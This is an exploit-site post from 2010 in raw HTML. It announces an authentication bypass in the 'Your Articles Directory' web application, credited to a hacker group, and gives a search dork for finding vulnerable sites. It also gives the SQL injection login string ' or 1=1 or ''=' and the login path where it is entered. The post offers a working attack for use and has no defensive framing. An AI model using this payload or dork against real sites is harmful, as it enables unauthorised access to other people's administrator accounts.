Articles Directory Authenication Bypass Vulnerability
Posted on 29 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Articles Directory Authenication Bypass Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================== Articles Directory Authenication Bypass Vulnerability ===================================================== # Exploit Title:Authenication Bypass Vulnerability in Articles Directory # Version: Web Application # vendor :http://www.yourarticlesdirectory.com/ # Date: 29 apr,2010 # Dork:Powered by Article Directory # Author:Sid3^effects # Code : -------------------------------------------------------------------------------------- #####################Sid3^effects aKa HaRi################################## #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] #Thanks:*L0rd ?rusAd?r*,d4rk-bluâ„¢®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR #ShouTZ:kedar,dec0d3r,41.w4r10r #Catch us at www.andhrahackers.com or www.teamicw.in ############################################################################ Description : Your Articles Directory is the most innovative state of the art solution you need to launch a customizable content driven web site in the shortest period of time. From user-friendly customization options to easy content creation process, Your Articles Directory prides itself in content authoring for its users... regardless of technical limitations. ############################################################################ Xploit : AUthenication Bypass Vulnerability By using the following combo ' or 1=1 or ''=' the attacker can login In the login option: http://server/designs/gator/ ###################################//EoF\################################### #Sid3^effects # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
